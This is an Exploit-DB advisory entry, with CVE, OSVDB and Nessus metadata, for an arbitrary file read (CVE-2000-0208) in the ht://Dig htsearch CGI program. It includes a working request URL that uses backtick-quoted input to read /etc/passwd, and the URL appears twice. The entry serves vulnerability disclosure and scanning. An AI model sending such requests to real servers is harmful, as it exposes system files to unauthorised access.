The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion
2000-02-29T00:00:00
ID EDB-ID:19785 Type exploitdb Reporter Geoff Hutchison Modified 2000-02-29T00:00:00
Description
The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 Arbitrary File Inclusion. CVE-2000-0208. Remote exploit for unix platform
source: http://www.securityfocus.com/bid/1026/info
ht://dig is a web content search engine for Unix platforms. The software is set up to allow for file inclusion from configuration files. Any string surrounded by the opening singlw quote character ( ` ) is taken as a path to a file for inclusion, for example:
some_parameter: `var/htdig/some_file`
htdig will also allow included files to be specified via form input. Therefore, any file can be specified for inclusion into a variable by any web user.
The URL:
http ://target/cgi-bin/htsearch?Exclude=%60/etc/passwd%60
will return a page with the contents of /etc/passwd in the 'exclude' field.
{"published": "2000-02-29T00:00:00", "id": "EDB-ID:19785", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "history": [], "enchantments": {"vulnersScore": 5.0}, "hash": "a268b9726a526236d83b4c2b4c76fa1558354c61a1b62b6173673f8096149b67", "description": "The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 Arbitrary File Inclusion. CVE-2000-0208. Remote exploit for unix platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/19785/", "lastseen": "2016-02-02T12:42:32", "edition": 1, "title": "The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion", "osvdbidlist": ["89"], "modified": "2000-02-29T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0208"], "sourceHref": "https://www.exploit-db.com/download/19785/", "references": [], "reporter": "Geoff Hutchison", "sourceData": "source: http://www.securityfocus.com/bid/1026/info\r\n\r\nht://dig is a web content search engine for Unix platforms. The software is set up to allow for file inclusion from configuration files. Any string surrounded by the opening singlw quote character ( ` ) is taken as a path to a file for inclusion, for example:\r\nsome_parameter:\t`var/htdig/some_file`\r\n\r\nhtdig will also allow included files to be specified via form input. Therefore, any file can be specified for inclusion into a variable by any web user.\r\n\r\nThe URL:\r\nhttp ://target/cgi-bin/htsearch?Exclude=%60/etc/passwd%60\r\nwill return a page with the contents of /etc/passwd in the 'exclude' field.", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2000-0208", "type": "cve", "title": "CVE-2000-0208", "description": "The htdig (ht://Dig) CGI program htsearch allows remote attackers to read arbitrary files by enclosing the file name with backticks (`) in parameters to htsearch.", "published": "2000-02-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0208", "cvelist": ["CVE-2000-0208"], "lastseen": "2016-09-03T02:35:10"}], "osvdb": [{"id": "OSVDB:89", "type": "osvdb", "title": "ht://Dig htsearch.cgi Arbitrary File Access", "description": "## Vulnerability Description\nht://Dig contains a flaw that allows a remote attacker to access arbitrary files. This flaw exists because the 'htsearch.cgi' script does not validate user-supplied input containing backticks (`), which could allow a remote attacker to access arbitrary files resulting in a loss of confidentiality.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, The ht://Dig Group has released a patch to address this vulnerability.\n## Short Description\nht://Dig contains a flaw that allows a remote attacker to access arbitrary files. This flaw exists because the 'htsearch.cgi' script does not validate user-supplied input containing backticks (`), which could allow a remote attacker to access arbitrary files resulting in a loss of confidentiality.\n## Manual Testing Notes\nhttp://[victim]/cgi-bin/htsearch?exclude=%60/etc/passwd%60\n## References:\nVendor URL: http://www.htdig.org/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2000/20000227)\n[Vendor Specific Advisory URL](http://www.turbolinux.com/pipermail/tl-security-announce/2000-March/000004.html)\n[Vendor Specific Advisory URL](ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:06-htdig.asc)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/suse_security_announce_42.txt)\n[Nessus Plugin ID:10105](https://vulners.com/search?query=pluginID:10105)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2000-02/0385.html\nISS X-Force ID: 4052\n[CVE-2000-0208](https://vulners.com/cve/CVE-2000-0208)\nBugtraq ID: 1026\n", "published": "2000-02-28T13:51:06", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://vulners.com/osvdb/OSVDB:89", "cvelist": ["CVE-2000-0208"], "lastseen": "2017-04-28T13:19:55"}], "nessus": [{"id": "HTDIG.NASL", "type": "nessus", "title": "ht://Dig < 3.1.5 htsearch CGI Multiple Vulnerabilities", "description": "The 'htsearch' CGI, which is part of the htdig package, allows anyone to read arbitrary files on the target host.", "published": "2000-03-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=10105", "cvelist": ["CVE-1999-0978", "CVE-2000-0208"], "lastseen": "2016-09-26T17:23:41"}]}}